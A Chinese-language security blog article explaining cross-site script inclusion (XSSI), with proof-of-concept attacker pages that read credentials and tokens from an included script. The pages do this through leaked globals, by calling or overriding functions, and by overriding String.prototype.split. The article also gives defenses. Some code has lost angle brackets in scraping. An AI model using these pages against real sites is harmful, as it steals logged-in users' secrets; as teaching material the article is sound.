行业新闻

XSSI漏洞小结

11 Apr, 2022 行业新闻

XSSI漏洞小结


简介

XSSI(Cross Site Script Inclusion)跨站脚本包含是一种允许攻击者通过嵌入script标签的src属性来加载敏感js绕过边界窃取信息的漏洞。

简单来讲,就是攻击者通过使用script>标签跨域包含特定文件/页面,就可以窃取符合JavaScript格式的文件中的敏感信息。

举例如下:

#!javascript
!-- attacker's page loads external data with SCRIPT tag -->
SCRIPTsrc="http://target.wooyun.org/secret">/SCRIPT>

原理

先来简单了解下什么是同源策略:

同源策略SOP(Same origin policy)是一种约定,也是浏览器最核心也最基本的安全功能,它限制了不同源之间如何进行资源交互,是用于隔离潜在恶意文件的重要安全机制。

如果两个 URL 的 protocolport(如果有指定的话)和 host都相同的话,则这两个 URL 是同源。这个方案也被称为“协议/主机/端口元组”,或者直接是 “元组”。(“元组” 是指一组项目构成的整体,双重/三重/四重/五重/等的通用形式)。

下表给出了与 URL http://store.company.com/dir/page.html 的源进行对比的示例:

URL

结果

原因

http://store.company.com/dir2/other.html

同源

只有路径不同

http://store.company.com/dir/inner/another.html

同源

只有路径不同

https://store.company.com/secure.html

失败

协议不同

http://store.company.com:81/dir/etc.html

失败

端口不同 ( http:// 默认端口是80)

http://news.company.com/dir/other.html

失败

主机不同

而XSSI的核心就是绕过了SOP来跨域包含含有敏感信息的外域文件,因为默认情况下不允许加载外域文件,而通过script标签是允许跨域加载资源的,如果某个网站的动态JS脚本、文件和响应中包含某些敏感信息,那么就存在信息泄漏的风险。

与其说是绕过SOP,个人感觉更像是利用了script标签的跨域特性。。。

利用场景

用户登录正常的网站A,网站A会给用户分配Cookie用于鉴权

用户访问攻击者构造的恶意页面B,页面包含有script标签,且src属性为网站A中含有敏感信息的JS文件或者特定页面(返回类型必须能被script识别解析)

攻击者可以从下载的动态JS文件中获取用户的敏感信息

1649215392_624d07a02c5ec4d2914aa.png?1649215392903

攻击利用

因为XSSI主要是通过script标签加载目标的敏感文件,再从敏感文件中获取信息;而敏感文件主要分为两类,分别是:

  • JavaScript文件
    • 静态JS文件(需要登陆后才能访问的,不然可以直接访问,没意义)
    • 动态JS文件
  • 非JavaScript文件(比较鸡肋)
    • CSV文件
    • JSON文件

针对JavaScript文件

静态JavaScript文件

这里遇到的情况相对较少,因为静态的JavaScript文件不登陆的情况下大多都是可以访问的,很少出现必须要登录才能访问的情况;如果不登陆的情况下都可以访问,那用了XSSI反而是多此一举。

  • 敏感JS文件
  • varusername = "admin";
    varpassword = "admin888";1649215413_624d07b5391a1c0105b31.png?1649215413463
  • XSSI利用代码
  • title>d4m1ts/title>
    scriptsrc="https://apps.bdimg.com/libs/jquery/2.1.4/jquery.min.js">/script>
    scriptsrc="http://127.0.0.1:8000/info.js">/script>
    scripttype="text/javascript">
    document.write("用户名:" + username);
    document.write("/br>");
    document.write("密码  :" + password);
    /script>1649215434_624d07caaf025cf202411.png?1649215435090

动态JavaScript文件

这种情况就比较多了,一般都是需要登陆后才能访问的,且通常包含有敏感信息,适合用来进行XSSI攻击

插曲

Q:如何判断一个JS是不是动态的

A1:用多个账号分别访问这个JS,看看返回的内容是不是一样的

A2:使用burp插件:DetectDynamicJS

直接调用相关函数
  • 敏感动态JS(动态生成token)
  • functiongetToken(){
    len = 16 || 32;
    var$chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz012345678';
    varmaxPos = $chars.length;
    vartoken = '';
    for(i = 0; i  len; i++) {
    token += $chars.charAt(Math.floor(Math.random() * maxPos));
    }
    returntoken;
    }
  • XSSI利用代码(直接调用getToken()函数)
  • title>d4m1ts/title>
    scriptsrc="https://apps.bdimg.com/libs/jquery/2.1.4/jquery.min.js">/script>
    scriptsrc="http://127.0.0.1:8000/info.js">/script>
    scripttype="text/javascript">
    vartoken = getToken();
    document.write("Token is : " + token);
    /script>1649215531_624d082bd64dc9d98de67.png?1649215532125
重写调用函数
  • 敏感动态JS
  • (function(){
    vartoken = getToken();
    doSomeThing(token);
    })();

    functiongetToken(){
    len = 16 || 32;
    var$chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz012345678';
    varmaxPos = $chars.length;
    vartoken = '';
    for(i = 0; i  len; i++) {
    token += $chars.charAt(Math.floor(Math.random() * maxPos));
    }
    returntoken;
    }
  • XSSI利用代码(重写doSomeThing(token)方法)
  • title>d4m1ts/title>

    scripttype="text/javascript">
    functiondoSomeThing(token){
    document.write("Token: " + token);
    }
    /script>
    scriptsrc="https://apps.bdimg.com/libs/jquery/2.1.4/jquery.min.js">/script>
    scriptsrc="http://127.0.0.1:8000/info.js">/script>1649215539_624d0833b36ba3545b41f.png?1649215539979
重写原型链

如果调用敏感数据的函数是内置的方法,比如String类型的内置方法split()、trim()、search()等,这些函数肯定是不能被直接重写的,但是我们可以通过重写原型链的方法来重写对应的内置函数。(还是重写方法。。。)

  • 敏感动态JS
  • (function(){
    vartoken = getToken();
    token.split("");
    })();

    functiongetToken(){
    len = 16 || 32;
    var$chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz012345678';
    varmaxPos = $chars.length;
    vartoken = '';
    for(i = 0; i  len; i++) {
    token += $chars.charAt(Math.floor(Math.random() * maxPos));
    }
    returntoken;
    }
  • XSSI利用代码(重写String原型链中的split()方法)
  • title>d4m1ts/title>

    scripttype="text/javascript">
    String.prototype.split = function(){
    document.write(this.toString());
    }
    /script>
    scriptsrc="https://apps.bdimg.com/libs/jquery/2.1.4/jquery.min.js">/script>
    scriptsrc="http://127.0.0.1:8000/info.js">/script>1649215556_624d0844ba7f374e5d1ca.png?1649215556962

针对非JavaScript类型文件

主要是利用IE的各种bug问题,而现在几乎很少有人使用IE了,算是比较鸡肋吧。。。

在chrome和firefox中已经不存在这个问题了

具体原因如下:

1649215569_624d08513ba9afe0d16af.png?1649215569486

有兴趣可以参考:XSSI攻击利用 - 大学生,原理也很简单

XSSI与XSS、CSRF、XS-Leak的区别

相同点:四者均为Web前端安全漏洞,都需要用户交互才能触发。

不同点:

  • XSS是在受害者html页面中注入恶意代码执行恶意操作,例如窃取已登录用户的cookie信息;
  • CSRF是通过诱使受害者访问恶意页面导致向目标页面发起请求,在受害者已登录的目标页面中执行恶意动作,例如提交修改用户密码的表单操作;
  • XS-Leaks是用于具有模糊查询的功能,请求结果只会返回两种有差异的结果,然后根据这些差异推断出用户的敏感信息;
  • XSSI是通过script标签的src属性来跨域包含含有敏感数据的文件来窃取敏感信息的;

防御

开发者永远也不要把敏感数据放在JavaScript文件中, 也不要放在JSONP中;

请求敏感文件/响应的尽量改为POST方式;

使用类似于CSRF-Token机制;

设置响应头为X-Content-Type-Options: nosniff,此时浏览器就会拒绝加载JS类型的数据;

参考